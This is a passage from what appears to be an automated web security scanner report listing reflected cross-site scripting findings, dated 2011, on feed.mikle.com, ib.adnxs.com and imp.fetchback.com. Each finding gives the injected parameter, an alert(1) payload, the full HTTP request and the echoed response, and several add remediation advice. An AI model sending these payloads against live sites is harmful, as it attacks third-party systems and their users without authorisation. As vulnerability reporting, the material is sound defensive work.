GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A31f355<script>alert(1)</script>578c7374c8&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
#content .feed_item{margin:0 0 7px 0;padding:0 0 7px 0;border-bottom:1px dashed #CCCCCC;}
#content .feed_item_title{margin:1px 0 1px 3px;padding:1px 2px 1px 3px;color:#2F50A31f355<script>alert(1)</script>578c7374c8;font-weight:bold;}
#content .feed_item_title a:link{color:#2F50A31f355<script>
...[SNIP]...

6.117. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9092f'%3balert(1)//3a808ff0e01 was submitted in the rssmikle_target parameter. This input was echoed as 9092f';alert(1)//3a808ff0e01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank9092f'%3balert(1)//3a808ff0e01&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
n strToInt(str) {
num = parseInt(str);
if(isNaN(num)){
return 0;
} else if(!num) {
return 0;
}
return num;
}

function init() {
var rssMikleType = '';
var anchorTarget = '_blank9092f';alert(1)//3a808ff0e01';
var itemPodcast = 'icon';

var containerObj = document.getElementById('container');
var headerObj = document.getElementById('header') ? document.getElementById('header') : "";
var contentObj
...[SNIP]...

6.118. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8879"><script>alert(1)</script>6430bab1586 was submitted in the rssmikle_target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blankc8879"><script>alert(1)</script>6430bab1586&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="http://asianewsnetwork.feedsportal.com/c/33359/f/566602/s/17ee84d1/l/0L0Sasianewsnet0Bnet0Chome0Cnews0Bphp0Did0F21347/story01.htm" target="_blankc8879"><script>alert(1)</script>6430bab1586">
...[SNIP]...

6.119. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_title_bgcolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_title_bgcolor request parameter is copied into the HTML document as plain text between tags. The payload 2a452<script>alert(1)</script>842b4a6f648 was submitted in the rssmikle_title_bgcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA2a452<script>alert(1)</script>842b4a6f648&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
ner{overflow:hidden;margin:0;padding:0;width:325px;height:200px;font-size:14px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFF;background-color:#2561BA2a452<script>alert(1)</script>842b4a6f648;background-image:url(http://);}
#header .feed_title{margin:0;padding:0;font-weight:bold;}
#header .feed_title a:link{color:#FFFFFF;text-decoration:none;}
#hea
...[SNIP]...

6.120. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_title_bgimage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_title_bgimage request parameter is copied into the HTML document as plain text between tags. The payload f266c<script>alert(1)</script>848a932e7f1 was submitted in the rssmikle_title_bgimage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2Ff266c<script>alert(1)</script>848a932e7f1&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
padding:0;width:325px;height:200px;font-size:14px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFF;background-color:#2561BA;background-image:url(http://f266c<script>alert(1)</script>848a932e7f1);}
#header .feed_title{margin:0;padding:0;font-weight:bold;}
#header .feed_title a:link{color:#FFFFFF;text-decoration:none;}
#header .feed_title a:visited{col
...[SNIP]...

6.121. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_title_color parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_title_color request parameter is copied into the HTML document as plain text between tags. The payload c3aa7<script>alert(1)</script>c2a92fd9cfe was submitted in the rssmikle_title_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFFc3aa7<script>alert(1)</script>c2a92fd9cfe&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
0;}
#container{overflow:hidden;margin:0;padding:0;width:325px;height:200px;font-size:14px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFFc3aa7<script>alert(1)</script>c2a92fd9cfe;background-color:#2561BA;background-image:url(http://);}
#header .feed_title{margin:0;padding:0;font-weight:bold;}
#header .feed_title a:link{color:#FFFFFFc3aa7<script>
...[SNIP]...

6.122. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_type request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88a7c'%3balert(1)//0a59d45db97 was submitted in the rssmikle_type parameter. This input was echoed as 88a7c';alert(1)//0a59d45db97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=88a7c'%3balert(1)//0a59d45db97&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
';
}
return tag;
}

function strToInt(str) {
num = parseInt(str);
if(isNaN(num)){
return 0;
} else if(!num) {
return 0;
}
return num;
}

function init() {
var rssMikleType = '88a7c';alert(1)//0a59d45db97';
var anchorTarget = '_blank';
var itemPodcast = 'icon';

var containerObj = document.getElementById('container');
var headerObj = document.getElementById('header') ? document.getElementById('
...[SNIP]...

6.123. http://ib.adnxs.com/ab [ccd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the ccd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0dea'-alert(1)-'eb8770d46f9 was submitted in the ccd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=AAAAAAAAEEApXI_C9SgMQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAABlAQAA2AMAAAIAAACjbggAPWQAAAEAAABVU0QAVVNEANgCWgAPHBcC3Q4BAgUCAQQAAAAAXBljhQAAAAA.&tt_code=vert-29&udj=uf%28%27a%27%2C+22407%2C+1315103289%29%3Buf%28%27c%27%2C+133618%2C+1315103289%29%3Buf%28%27r%27%2C+552611%2C+1315103289%29%3Bppv%2815706%2C+%278375801096906282887%27%2C+1315103289%2C+1315362489%2C+133618%2C+25661%29%3B&cnd=!1xYx6wjykwgQo90hGAAgvcgBMAA4jzhAAEjYB1AAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBArABALkBAAAAAAAAEEDBAQAAAAAAABBAyQEzMzMzMzP3P9kBAAAAAAAA8D_gAQA.&ccd=!BQXSKQjykwgQo90hGL3IASAAf0dea'-alert(1)-'eb8770d46f9&referrer=http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917&media_subtypes=1&pp=AAABMjJDsl8k6iYL9tmoP8L7nDlZjEhOctPlYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG6Q/E:3F.0s]#%2L_'x%SEV/i#+31!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZVGg1td>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3JWdNI6Q!=v6WStTMc; sess=1; uuid2=6422714091563403120

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 03:31:07 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=9223372036854775807; path=/; expires=Sat, 03-Dec-2011 03:31:07 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: anj=Kfu=8fG7]PE:3F.0s]#%2L_'x%SEV/i#+eBqRb7#LsAmzW9/lCds`HP(+mKpu)>6%UH-qr%qHop_br2@fCSU7U-7NN1YVyRhjA8z8MH2+N/S]qL(nhCss8v3>zv]M3ZUWcusBmTRcQtHpK'R`=ls*J!:!Eun?en]; path=/; expires=Sat, 03-Dec-2011 03:31:07 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 04 Sep 2011 03:31:07 GMT
Content-Length: 809

document.write('<scr' + 'ipt language=\'javascript\' type=\'text/javascript\' src=\'http://imp.fetchback.com/serve/fb/adtag.js?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAABlAQAA2AMAAAIAAACjbggAPWQAAAEAAABVU0QAVVNEANgCWgAPHBcC3Q4BAgUCAQQAAAAAAh34QwAAAAA./cnd=!BQXSKQjykwgQo90hGL3IASAAf0dea'-alert(1)-'eb8770d46f9/referrer=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAA
...[SNIP]...

6.124. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a8b9"-alert(1)-"f38fbf2b4a7 was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAABlAQAA2AMAAAIAAACjbggAPWQAAAEAAABVU0QAVVNEANgCWgAPHBcC3Q4BAgUCAQQAAAAAAh34QwAAAAA./cnd=!BQXSKQjykwgQo90hGL3IASAA/referrer=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%253D%2526dst%253D2a8b9"-alert(1)-"f38fbf2b4a7&tid=68324&type=lead HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097285_34021:68285:1:0:0_34024:68283:2:234:326_34024:68292:2:119122:119204_34023:68293:1:119835:119835; uid=1_1315097285_1314893682667:5756480826433243; kwd=1_1315097285; scg=1_1315097285; ppd=1_1315097285; act=1_1315097285

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:29:12 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315106952_1314893682667:57564808264332436; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:12 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 03:29:12 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 845

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAAB
...[SNIP]...
52Fclick%253Fcd%253DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%253D%2526dst%253D2a8b9"-alert(1)-"f38fbf2b4a7&tid=68324&type=lead' width='728' height='90' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

6.125. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1781d"-alert(1)-"f40f9a0d3a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAABlAQAA2AMAAAIAAACjbggAPWQAAAEAAABVU0QAVVNEANgCWgAPHBcC3Q4BAgUCAQQAAAAAAh34QwAAAAA./cnd=!BQXSKQjykwgQo90hGL3IASAA/referrer=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%253D%2526dst%253D&tid=68324&type=lead&1781d"-alert(1)-"f40f9a0d3a9=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
